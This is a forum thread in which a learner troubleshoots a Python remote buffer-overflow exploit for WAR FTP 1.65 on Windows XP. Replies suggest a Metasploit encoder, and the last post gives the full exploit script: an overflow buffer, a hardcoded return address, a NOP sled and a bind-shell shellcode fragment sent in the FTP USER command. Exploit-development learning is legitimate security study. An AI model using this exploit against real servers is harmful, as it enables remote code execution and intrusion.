.

Frustrated with Shellcode

<<

N3WB134444

Newbie
Newbie

Posts: 5

Joined: Mon Jun 21, 2010 7:55 am

Post Mon Jun 21, 2010 8:22 am

Frustrated with Shellcode

I started coding the WAR FTP 1.65 Remote Code exploit in python to exploit a Win XP SP2 machine this morning and it's still not finished:(. it went fine up until the point that shellcode had to be added.

i managed to overwrite EIP with my A's and eventually with a JMP EBP from my USR32.dl file and even managed to put in my breakpoints where my shellcode was supposed to go, everything worked with Ollydbg. but I kept failing at the shellcode which I generated with Msfpayload. I spent the rest of the day playing around with different  shellcodes trying to get the blasted thing to work, I played with different connecting shellcodes, vnc injects encoders and even filtering out bad characters, padding with Nops and the blasted thing still wouldn't work.

Could anybody please provide me with any tips for shellcode. I understand the difference between types of shells e.g bind and reverse but the different encoders are throwing me off. could I have just missed a bad character somewhere. Any help would be much appreciated thanks :)
<<

n1p

Jr. Member
Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Wed Jun 23, 2010 3:37 pm

Re: Frustrated with Shellcode

Better late than neveer ;) I normally use the alpha upper encoder which should remove bad characters. I remember having problems with the gai-nai encoder and removing bad characters whilst exploiting a program previously.

msfencode -e x86/alpha_upper -t c

Paste that into your exploit code and see. Also happy to look at your code if necessary.

http://seclists.org/metasploit/2006/q4/51 - possibly related

cheers
Last edited by n1p on Wed Jun 23, 2010 3:46 pm, edited 1 time in total.
<<

N3WB134444

Newbie
Newbie

Posts: 5

Joined: Mon Jun 21, 2010 7:55 am

Post Thu Jun 24, 2010 4:39 am

Re: Frustrated with Shellcode

Thanks very much for your help and wreply I will give it a go and let you know how it turns out

Cheers
<<

n1p

Jr. Member
Jr. Member

Posts: 89

Joined: Tue Mar 16, 2010 5:31 pm

Post Thu Jun 24, 2010 3:21 pm

Re: Frustrated with Shellcode

No problem, do let us know how it turns out  :P
<<

N3WB134444

Newbie
Newbie

Posts: 5

Joined: Mon Jun 21, 2010 7:55 am

Post Fri Jun 25, 2010 5:04 am

Re: Frustrated with Shellcode

well i tried Alpha_Upper encoding, reviewed my code and couldn't see anything that terminate the string. so here is my code.

EIP was overwritten at the 476th byte.

I used JMP EBP which i discovered in USER32.dll as it had more room for shellcode.

I used a ./msfpaylod windows/shell_bind_tcp payload with the /x86/alpha
encoder

Any insight that you could provide would be most appreciative thanks

#!/usr/bin/python
import socket
s= socket.socket(socket.AF_INET, socket.SOCK_STREAM)
shell=("\x89\xe6\xd9\xc3\xd9\x76\xf4\x5e\x56\x59\x49\x49\x49\x49\x43""\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34""\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41"
"\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58"
"\x50\x38\x41\x43\x4a\x4a\x49\x41\x41")
ret = "\x32\xa4\xd5\x77"
#EBP ADDRESS 77D5A432
buffer = '\x41' *476 + ret + '\x90' *16 + '\x90' * 16 + shell
print "\nSending evil buffer..."
s.connect (('10.16.250.4',21))
data=s.recv(1024)
s.send('USER anonymous' + buffer +'\r\n')
data = s.recv(1024)
s.close()

Return to Programming

Who is online

Users browsing this forum: No registered users and 0 guests

.
Powered by phpBB® Forum Software © phpBB Group.
Designed by ST Software